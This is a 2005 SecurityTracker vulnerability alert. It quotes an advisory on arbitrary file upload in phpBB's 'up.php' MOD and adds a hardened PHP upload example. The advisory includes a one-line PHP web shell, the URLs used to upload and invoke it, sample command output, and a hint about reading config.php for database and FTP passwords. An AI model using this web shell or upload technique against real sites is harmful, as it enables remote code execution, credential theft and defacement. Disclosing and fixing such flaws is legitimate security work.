SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  File Upload Script (up.php)
Vendors:  Meilad
File Upload Script 'up.php' for phpBB Lets Remote Users Upload Arbitrary Files
SecurityTracker Alert ID:  1013671
SecurityTracker URL:  http://securitytracker.com/id?1013671
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Apr 9 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1
Description:  A vulnerability was reported in the 'File Upload Script' phpBB MOD. A remote user can upload files with arbitrary content and filename extensions.

The 'up.php' script does not restrict filename extensions or file contents. A remote user can upload an arbitrary file with a '.php' file extension. Then, the remote user can invoke the uploaded file to execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Status-x reported this vulnerability.

Impact:  A remote user can upload arbitrary PHP code to the target system and then execute the code with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Status-x <phr4xz@gmail.com>
Message History:   None.


 Source Message Contents

Date:  Thu, 7 Apr 2005 20:21:38 -0600
From:  Status-x <phr4xz@gmail.com>
Subject:  [infosec-discuss] phpBB Upload Script "up.php" Arbitrary File Upload

 


#####################################################################

Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"

$ Author: Status-x
$ Contact: phr4xz@gmail.com - status-x@hackersoft.net
$ Date: 7 April 2005
$ Website: http://defacers.com.mx
$ Original Advisory: http://www.defacers.com.mx/advisories/2.txt
$ Risk: High
$ Vendor URL: http://phpbb.com

$ Affected Software: phpBB 2.0.x

Note: Sorry if it has been posted before

#####################################################################

-= Description =-

phpBB is a forum system written in PHP which can support images, polls, private messages and more

http://www.phpbb.com

---------------------------------------------------------------------------

-= Vulnerabilities =-


- | "Arbitrary File Upload" |


In phpBB forums there is a script which can allow remote and registered users to upload files with arbitrary content and with any extension.

I didn't find any website where I can download the script so I couldn't check who made it.



- | Examples: |


We can create an example code to upload it to the "test site"


<?

system($cmd)

?>


And save it as cmd.php. Then we go to:

--------------------------

http://target/phpbb/up.php

--------------------------


And upload our code. To see our file we just go to:

-----------------------------------

http://target/phpbb/uploads/cmd.php

-----------------------------------


And we could see that our file has been uploaded:



Warning: system(): Cannot execute a blank command in 
/home/target/public_html/forum/uploads/tetx.php on line 2


Then we can execute *NIX commands to obtain extremely compromising info that could end with the "deface" of the affected site:

-----------------------------------------------------

Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux
/home/target/public_html/forum/uploads
uid=32029(target) gid=530(target) groups=530(target) 

------------------------------------------------------

This is just an example of what can be done by a malicious attacker.


- | "Password Disclosure" |


The remote or local attacker can also read the config.php file, disclosing the information about the DB and possibly the FTP password


------------------------------------------------------

Example

-= How to FIX =-

Just filter the allowed extensions of the uploaded files in the up.php source.


-= Contact =-

Status-x 

phr4xz@gmail.com

http://www.defacers.com.mx
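
The fix named in the advisory (filtering allowed extensions), combined with the content restriction the SecurityTracker description says 'up.php' lacks, as an added example that is not the MOD's code or the advisory author's. The form field name `file`, the storage directory, the size limit and the allowlist entries are assumptions.

```php
<?php
// Added example: hardened upload handling. Not the MOD's own code.
// Assumed names: form field "file", storage directory UPLOAD_DIR.
const UPLOAD_DIR = '/var/lib/forum-uploads';   // assumption: outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;            // assumption: 2 MiB limit
// Allowlist: extension => MIME type the content must actually have.
const ALLOWED = [
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'gif' => 'image/gif',
    'txt' => 'text/plain',
];

function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] <= 0 || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('file size not allowed');
    }
    // Extension check: the final extension, lower-cased, must be allowlisted.
    $ext = strtolower(pathinfo((string)$file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Content check: sniff the bytes; ignore the client-sent Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-generated name: the client-supplied name never reaches the disk.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    chmod(UPLOAD_DIR . '/' . $name, 0640);
    return $name;
}

if (isset($_FILES['file'])) {
    try {
        echo 'stored as ', htmlspecialchars(store_upload($_FILES['file']));
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ', htmlspecialchars($e->getMessage());
    }
}
```

Keeping the storage directory outside the document root, or disabling PHP execution for it, means an uploaded file cannot be invoked by URL even if one of the checks is bypassed.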

 



Copyright 2005, SecurityGlobal.net LLC